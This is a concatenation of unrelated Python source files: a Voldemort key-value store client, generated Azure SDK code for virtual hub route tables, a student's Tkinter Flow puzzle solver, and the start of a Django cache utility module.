## If so reconnect to a random node in the cluster. No attempt is made at preventing the reconnecting
## from going back to the same node
def _maybe_reconnect(self):
if self.request_count >= self.reconnect_interval:
logging.debug('Completed ' + str(self.request_count) + ' requests using this connection, reconnecting...')
self.node_id, self.connection = self._reconnect()
## send a request to the server using the given connection
def _send_request(self, connection, req_bytes):
connection.send(struct.pack('>i', len(req_bytes)) + req_bytes)
self.request_count += 1
## read a response from the connection
def _receive_response(self, connection):
size_bytes = connection.recv(4)
if not size_bytes:
raise VoldemortException('Connection closed')
size = struct.unpack('>i', size_bytes)[0]
bytes_read = 0
data = []
while size and bytes_read < size:
chunk = connection.recv(size - bytes_read)
bytes_read += len(chunk)
data.append(chunk)
return ''.join(data)
## Bootstrap cluster metadata from a list of urls of nodes in the cluster.
## The urls are tuples in the form (host, port).
## A dictionary of node_id => node is returned.
def _bootstrap_metadata(self, bootstrap_urls, store_name):
random.shuffle(bootstrap_urls)
for host, port in bootstrap_urls:
logging.debug('Attempting to bootstrap metadata from ' + host + ':' + str(port))
connection = None
try:
connection = self._make_connection(host, port)
cluster_xmls = self._get_with_connection(connection, 'metadata', 'cluster.xml', should_route = False)
if len(cluster_xmls) != 1:
raise VoldemortException('Expected exactly one version of the metadata but found ' + str(cluster_xmls))
nodes = Node.parse_cluster(cluster_xmls[0][0])
logging.debug('Bootstrap from ' + host + ':' + str(port) + ' succeeded, found ' + str(len(nodes)) + " nodes.")
stores_xml = self._get_with_connection(connection, 'metadata', 'stores.xml', should_route=False)[0][0]
store = Store.parse_stores_xml(stores_xml, store_name)
return nodes, store
except socket.error, (err_num, message):
logging.warn('Metadata bootstrap from ' + host + ':' + str(port) + " failed: " + message)
finally:
self._close_socket(connection)
raise VoldemortException('All bootstrap attempts failed')
## check if the server response has an error, if so throw an exception
def _check_error(self, resp):
if resp.error and resp.error.error_code != 0:
raise VoldemortException(resp.error.error_message, resp.error.error_code)
## Increment the version for a vector clock
def _increment(self, clock):
new_clock = protocol.VectorClock()
new_clock.MergeFrom(clock)
# See if we already have a version for this guy, if so increment it
for entry in new_clock.entries:
if entry.node_id == self.node_id:
entry.version += 1
return new_clock
# Otherwise add a version
entry = new_clock.entries.add()
entry.node_id = self.node_id
entry.version = 1
new_clock.timestamp = int(time.time() * 1000)
return new_clock
## Take a list of versions, and, if a conflict resolver has been given, resolve any conflicts that can be resolved
def _resolve_conflicts(self, versions):
if self.conflict_resolver and versions:
return self.conflict_resolver(versions)
else:
return versions
## Turn a protocol buffer list of versioned items into a python list of items
def _extract_versions(self, pb_versioneds):
versions = []
for versioned in pb_versioneds:
versions.append((versioned.value, versioned.version))
return self._resolve_conflicts(versions)
## A basic request wrapper, that handles reconnection logic and failures
def _execute_request(self, fun, args):
assert self.open, 'Store has been closed.'
self._maybe_reconnect()
failures = 0
num_nodes = len(self.nodes)
while failures < num_nodes:
try:
return apply(fun, args)
except socket.error, (err_num, message):
logging.warn('Error while performing ' + fun.__name__ + ' on node ' + str(self.node_id) + ': ' + message)
self.node_id, self.connection = self._reconnect()
failures += 1
raise VoldemortException('All nodes are down, ' + fun.__name__ + ' failed.')
## An internal get function that take the connection and store name as parameters. This is
## used by both the public get() method and also the metadata bootstrap process
def _get_with_connection(self, connection, store_name, key, should_route):
"""Execute get request to the given store. Returns a (value, version) pair."""
req = protocol.VoldemortRequest()
req.should_route = should_route
req.store = store_name
req.type = protocol.GET
req.get.key = key
# send request
self._send_request(connection, req.SerializeToString())
# read and parse response
resp_str = self._receive_response(connection)
resp = protocol.GetResponse()
resp.ParseFromString(resp_str)
self._check_error(resp)
return self._extract_versions(resp.versioned)
## Inner helper function for get
def _get(self, key):
return self._get_with_connection(self.connection, self.store_name, key, True)
def get(self, key):
"""Execute a get request. Returns a list of (value, version) pairs."""
raw_key = self.key_serializer.writes(key)
return [(self.value_serializer.reads(value), version)
for value, version in self._execute_request(self._get, [raw_key])]
## Inner get_all method that takes the connection and store_name as parameters
def _get_all(self, keys):
req = protocol.VoldemortRequest()
req.should_route = True
req.store = self.store_name
req.type = protocol.GET_ALL
for key in keys:
req.getAll.keys.append(key)
# send request
self._send_request(self.connection, req.SerializeToString())
# read and parse response
resp_str = self._receive_response(self.connection)
resp = protocol.GetAllResponse()
resp.ParseFromString(resp_str)
self._check_error(resp)
values = {}
for key_val in resp.values:
values[key_val.key] = self._extract_versions(key_val.versions)
return values
def get_all(self, keys):
"""Execute get request for multiple keys given as a list or tuple.
Returns a dictionary of key => [(value, version), ...] pairs."""
raw_keys = [self.key_serializer.writes(key) for key in keys]
return dict((self.key_serializer.reads(key), [(self.value_serializer.reads(value), version)
for value, version in versioned_values])
for key, versioned_values in self._execute_request(self._get_all, [raw_keys]).iteritems())
## Get the current version of the given key by doing a get request to the store
def _fetch_version(self, key):
versioned = self.get(key)
if versioned:
version = versioned[0][1]
else:
version = protocol.VectorClock()
version.timestamp = int(time.time() * 1000)
return version
def _put(self, key, value, version):
req = protocol.VoldemortRequest()
req.should_route = True
req.store = self.store_name
req.type = protocol.PUT
req.put.key = key
req.put.versioned.value = value
req.put.versioned.version.MergeFrom(version)
# send request
self._send_request(self.connection, req.SerializeToString())
# read and parse response
resp_str = self._receive_response(self.connection)
resp = protocol.PutResponse()
resp.ParseFromString(resp_str)
self._check_error(resp)
return self._increment(version)
def put(self, key, value, version = None):
"""Execute a put request using the given key and value. If no version is specified a get(key) request
will be done to get the current version. The updated version is returned."""
raw_key = self.key_serializer.writes(key)
raw_value = self.value_serializer.writes(value)
# if we don't have a version, fetch one
if not version:
version = self._fetch_version(key)
return self._execute_request(self._put, [raw_key, raw_value, version])
def maybe_put(self, key, value, version = None):
"""Execute a put request using the given key and value. If the version being put is obsolete,
no modification will be made and this function will return None. Otherwise it will return the new version."""
try:
return self.put(key, value, version)
except:
return None
def _delete(self, key, version):
req = protocol.VoldemortRequest()
req.should_route = True
req.store = self.store_name
req.type = protocol.DELETE
req.delete.key = key
req.delete.version.MergeFrom(version)
# send request
self._send_request(self.connection, req.SerializeToString())
# read and parse response
resp_str = self._receive_response(self.connection)
resp = protocol.DeleteResponse()
resp.ParseFromString(resp_str)
self._check_error(resp)
return resp.success
def delete(self, key, version = None):
"""Execute a delete request, deleting all keys up to and including the given version.
If no version is given a get(key) request will be done to find the latest version."""
raw_key = self.key_serializer.writes(key)
# if we don't have a version, fetch one
if version == None:
version = self._fetch_version(key)
return self._execute_request(self._delete, [raw_key, version])
def close(self):
"""Close the connection this store maintains."""
self.open = False
self.connection.close()
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualHubRouteTableV2SOperations(object):
"""VirtualHubRouteTableV2SOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualHubRouteTableV2"
"""Retrieves the details of a VirtualHubRouteTableV2.
:param resource_group_name: The resource group name of the VirtualHubRouteTableV2.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param route_table_name: The name of the VirtualHubRouteTableV2.
:type route_table_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualHubRouteTableV2, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_05_01.models.VirtualHubRouteTableV2
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHubRouteTableV2"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualHubRouteTableV2', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
virtual_hub_route_table_v2_parameters, # type: "_models.VirtualHubRouteTableV2"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualHubRouteTableV2"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHubRouteTableV2"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(virtual_hub_route_table_v2_parameters, 'VirtualHubRouteTableV2')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualHubRouteTableV2', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualHubRouteTableV2', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
virtual_hub_route_table_v2_parameters, # type: "_models.VirtualHubRouteTableV2"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualHubRouteTableV2"]
"""Creates a VirtualHubRouteTableV2 resource if it doesn't exist else updates the existing
VirtualHubRouteTableV2.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param route_table_name: The name of the VirtualHubRouteTableV2.
:type route_table_name: str
:param virtual_hub_route_table_v2_parameters: Parameters supplied to create or update
VirtualHubRouteTableV2.
:type virtual_hub_route_table_v2_parameters: ~azure.mgmt.network.v2020_05_01.models.VirtualHubRouteTableV2
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualHubRouteTableV2 or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_05_01.models.VirtualHubRouteTableV2]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHubRouteTableV2"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
route_table_name=route_table_name,
virtual_hub_route_table_v2_parameters=virtual_hub_route_table_v2_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualHubRouteTableV2', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes a VirtualHubRouteTableV2.
:param resource_group_name: The resource group name of the VirtualHubRouteTableV2.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param route_table_name: The name of the VirtualHubRouteTableV2.
:type route_table_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
route_table_name=route_table_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ListVirtualHubRouteTableV2SResult"]
"""Retrieves the details of all VirtualHubRouteTableV2s.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVirtualHubRouteTableV2SResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_05_01.models.ListVirtualHubRouteTableV2SResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVirtualHubRouteTableV2SResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ListVirtualHubRouteTableV2SResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables'} # type: ignore
|
|
#Rootul Patel 10/28/13
#HW9 - FlowSolver
from Tkinter import *
#Define window / lists / constants
window = Tk()
window.title("Flow Solver")
gridSize = 6
clickCount = 0
tileCount = 0
endPoints = []
tileList = []
cells = []
colorList = ["blue", "green", "red", "yellow", "cyan", "orange", "magenta", "pink", "white"]
endPointFileList = ["blueEndpoint.gif", "greenEndpoint.gif", "redEndpoint.gif",
"yellowEndpoint.gif", "cyanEndpoint.gif", "orangeEndpoint.gif",
"magentaEndpoint.gif", "pinkEndpoint.gif", "whiteEndpoint.gif"]
fileList = ["blueHorizontal.gif", "blueQ1.gif", "blueQ2.gif", "blueQ3.gif", "blueQ4.gif", "blueVertical.gif",
"greenHorizontal.gif", "greenQ1.gif", "greenQ2.gif", "greenQ3.gif", "greenQ4.gif", "greenVertical.gif",
"redHorizontal.gif", "redQ1.gif", "redQ2.gif", "redQ3.gif", "redQ4.gif", "redVertical.gif",
"yellowHorizontal.gif", "yellowQ1.gif", "yellowQ2.gif", "yellowQ3.gif", "yellowQ4.gif", "yellowVertical.gif",
"cyanHorizontal.gif", "cyanQ1.gif", "cyanQ2.gif", "cyanQ3.gif", "cyanQ4.gif", "cyanVertical.gif",
"orangeHorizontal.gif", "orangeQ1.gif", "orangeQ2.gif", "orangeQ3.gif", "orangeQ4.gif", "orangeVertical.gif",
"magentaHorizontal.gif", "magentaQ1.gif", "magentaQ2.gif", "magentaQ3.gif", "magentaQ4.gif", "magentaVertical.gif",
"pinkHorizontal.gif", "pinkQ1.gif", "pinkQ2.gif", "pinkQ3.gif", "pinkQ4.gif", "pinkVertical.gif",
"whiteHorizontal.gif", "whiteQ1.gif", "whiteQ2.gif", "whiteQ3.gif", "whiteQ4.gif", "whiteVertical.gif"]
for filename in endPointFileList:
photo = PhotoImage(file="Cell images/" + filename)
for color in colorList:
if color in filename:
photo.color = color
photo.goesUp = photo.goesDown = photo.goesLeft = photo.goesRight = True
endPoints.append(photo)
for filename in fileList:
photo = PhotoImage(file="Cell images/" + filename)
if "Vertical" in filename or "Q1" in filename or "Q2" in filename:
photo.goesUp = True
else:
photo.goesUp = False
if "Vertical" in filename or "Q3" in filename or "Q4" in filename:
photo.goesDown = True
else:
photo.goesDown = False
if "Horizontal" in filename or "Q1" in filename or "Q4" in filename:
photo.goesRight = True
else:
photo.goesRight = False
if "Horizontal" in filename or "Q2" in filename or "Q3" in filename:
photo.goesLeft = True
else:
photo.goesLeft = False
for color in colorList:
if color in filename:
photo.color = color
tileList.append(photo)
empty = PhotoImage(file="Cell images/Empty.gif")
empty.goesUp = empty.goesDown = empty.goesLeft = empty.goesRight = True
wall = PhotoImage(file="Cell images/Wall.gif")
wall.goesUp = wall.goesDown = wall.goesLeft = wall.goesRight = False
#Build Buttons
def makeCells():
global cells
for row in range (0,gridSize+2):
cells.append([])
for col in range (0,gridSize+2):
if row == 0 or col == 0 or row == gridSize+1 or col == gridSize+1:
button = Button(window, image = wall)
button.image = wall
cells[row].append(button)
else:
button = Button(window, image = empty)
button.image = empty
button.grid(row = row, column = col)
cells[row].append(button)
def press(b=button):
global clickCount
if clickCount < 18:
b.config(image = endPoints[clickCount/2])
b.image = endPoints[clickCount/2]
clickCount = clickCount + 1
else:
b.config(image = empty)
b.image = empty
button.config(command = press)
makeCells()
#Solver
def isAllowedRight(curr, right):
if right==empty:
return True
if curr.goesRight and right.goesLeft and curr.color==right.color:
return True
if not curr.goesRight and not right.goesLeft:
return True
if not curr.goesRight and right in endPoints:
return True
return False
def isAllowedLeft(curr, left):
if left==empty:
return True
if curr.goesLeft and left.goesRight and curr.color==left.color:
return True
if not curr.goesLeft and not left.goesRight:
return True
if not curr.goesLeft and left in endPoints:
return True
return False
def isAllowedAbove(curr, up):
if up==empty:
return True
if curr.goesUp and up.goesDown and curr.color==up.color:
return True
if not curr.goesUp and not up.goesDown:
return True
if not curr.goesUp and up in endPoints:
return True
return False
def isAllowedBelow(curr, down):
if down==empty:
return True
if curr.goesDown and down.goesUp and curr.color==down.color:
return True
if not curr.goesDown and not down.goesUp:
return True
if not curr.goesDown and down in endPoints:
return True
return False
def checkCell(row, col):
global cells
curr = cells[row][col].image
right = cells[row][col+1].image
left = cells[row][col-1].image
down = cells[row+1][col].image
up = cells[row-1][col].image
if isAllowedRight(curr, right) and isAllowedLeft(curr, left) and isAllowedAbove(curr, up) and isAllowedBelow(curr, down):
return True
return False
def checkEndpoint():
global cells
for row in range (1,gridSize+1):
for col in range (1,gridSize+1):
curr = cells[row][col]
if curr.image in endPoints:
up = cells[row-1][col].image
down = cells[row+1][col].image
left = cells[row][col-1].image
right = cells[row][col+1].image
nearbyEmptys = 0
nearbyGoesIn = 0
if up == empty:
nearbyEmptys +=1
if down == empty:
nearbyEmptys +=1
if left == empty:
nearbyEmptys +=1
if right == empty:
nearbyEmptys +=1
if up.goesDown == True:
nearbyGoesIn +=1
if down.goesUp == True:
nearbyGoesIn +=1
if left.goesRight == True:
nearbyGoesIn +=1
if right.goesLeft == True:
nearbyGoesIn +=1
if nearbyGoesIn >= 1:
return False
elif nearbyGoesIn == 0 and nearbyEmptys == 0:
return False
else:
return True
##def take(row, col):
## global cells
## global tileCount
## curr = cells[row][col]
## curr.config(image = tileList[tileCount])
## curr.image = tileList[tileCount]
## window.update_idletasks()
## if checkCell(row, col) == True:
## if checkEndpoint() == True:
## if solve() == True:
## tileCount = 0
## return True
## elif tileCount < len(tileList)-1:
## tileCount += 1
## take(row, col)
## else:
## curr.config(image = empty)
## curr.image = empty
## tileCount = 0
## return False
def take(row, col):
global cells
for i in range(len(tileList)):
cells[row][col].config(image = tileList[i])
cells[row][col].image = tileList[i]
window.update_idletasks()
if checkCell(row, col) == True:
if checkEndpoint() == True:
if solve() == True:
return True
cells[row][col].config(image = empty)
cells[row][col].image = empty
return False
def solve():
global cells
for row in range (1,gridSize+1):
for col in range (1,gridSize+1):
x = cells[row][col]
if x.image == empty:
if take(row, col) == True:
return True
else:
return False
return True
def testCase():
global cells
cells[2][2].config(image = endPoints[0]) #Blue
cells[2][2].image = endPoints[0]
cells[5][3].config(image = endPoints[0])
cells[5][3].image = endPoints[0]
cells[3][4].config(image = endPoints[1]) #Green
cells[3][4].image = endPoints[1]
cells[6][4].config(image = endPoints[1])
cells[6][4].image = endPoints[1]
cells[5][4].config(image = endPoints[2]) #Red
cells[5][4].image = endPoints[2]
cells[6][3].config(image = endPoints[2])
cells[6][3].image = endPoints[2]
cells[2][5].config(image = endPoints[3]) #Yellow
cells[2][5].image = endPoints[3]
cells[5][5].config(image = endPoints[3])
cells[5][5].image = endPoints[3]
solveButton = Button(window, text = "Solve", command = solve)
solveButton.grid(row = 10, column = 1, columnspan = 3, sticky = "NSEW")
testButton = Button(window, text = "Test Case", command = testCase)
testButton.grid(row = 10, column = 4, columnspan = 3, sticky = "NSEW")
window.mainloop()
|
|
from __future__ import absolute_import
from __future__ import print_function
from functools import wraps
from django.core.cache import cache as djcache
from django.core.cache import get_cache
from django.conf import settings
from django.db.models import Q
from typing import Any, Callable, Iterable, Optional
from zerver.lib.utils import statsd, statsd_key, make_safe_digest
import time
import base64
import random
import sys
import os
import os.path
import hashlib
remote_cache_time_start = 0.0
remote_cache_total_time = 0.0
remote_cache_total_requests = 0
def get_remote_cache_time():
# type: () -> float
return remote_cache_total_time
def get_remote_cache_requests():
# type: () -> int
return remote_cache_total_requests
def remote_cache_stats_start():
# type: () -> None
global remote_cache_time_start
remote_cache_time_start = time.time()
def remote_cache_stats_finish():
# type: () -> None
global remote_cache_total_time
global remote_cache_total_requests
